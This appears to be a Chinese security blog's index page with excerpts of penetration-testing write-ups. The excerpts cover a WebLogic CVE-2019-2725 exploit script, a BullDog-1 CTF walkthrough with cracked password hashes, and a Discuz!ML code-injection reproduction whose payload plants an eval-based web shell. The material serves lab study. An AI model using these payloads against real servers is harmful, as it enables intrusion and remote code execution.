对近期众测的一次总结
0x01 前言 最近对客户网站进行众测,总结了一下大佬们挖的洞,复盘学习一下。
0x02 漏洞1、Weblogic反序列化 CVE-2019-2725
漏洞利用代码
# encoding=utf8import sysimport requestsfrom logzero import loggerheaders = { "Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8", "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", "Content-Type":"text/xml",}def weblogic_10_3_6(ip,cmd): headers = { "Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8", "User-Agent":"Mozilla/ ...
BullDog-1靶机
环境:kali攻击机、windwos10
网络:桥接模式
0x01 信息收集同网段主机使用arp-scan -l命令查看所有网段IP
端口扫描
nmap 192.168.1.0/24
获取到靶机IP地址 192.168.1.158
开放 23、80、8080端口,上扫描器
查看了80和8080网页,两个网页无差别
上扫描器扫描
dirb扫描的目录信息
http://192.168.1.158/admin/login/?next=/admin/
发现一个后台管理员登陆页面,尝试弱口令失败。。想想也不会存在弱口令
http://192.168.1.158/dev/ 访问此连接存在一个web-shell连接,但是需登录。
翻译了网页信息,发现网站是Django写的,用是python.
查看网页源代码,发现hash值
0x02 获取webshell解密
ddf45997a7e18a25ad5f5cf222da64814dd060d5:bulldogd8b8dd5e7f000b8dea26ef8428caf38c04466b3e:bulldoglover解密最后两个密码,最 ...
Discuz!ML V3.X 代码注入漏洞复现
0x01 环境搭建源码下载地址:https://bitbucket.org/vot/discuz.ml/get/tip.zip(需翻墙)
集成环境:phpstudy
搭建成功截图
0x02 漏洞复现使用burp抓包
漏洞存在此页面
http://192.168.1.51/dz3.4/upload/portal.php
payload:Tt13_2132_language=es '.phpinfo().';
payload'. file_put_contents('shell.php',urldecode('<?php eval($_GET["jaky"]);?>')).'需要进行两次编码exp:%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp%2520eval%28%2524_%2547%2545%2554%255b%2522jaky%2522%255d%29%253b%253f%253e%27%29%29.%27
0x03 总结本来想根据里面的漏 ...
我的博客
博客终于搭建起来了,后面慢慢的搞
System.out.println("Hello World!");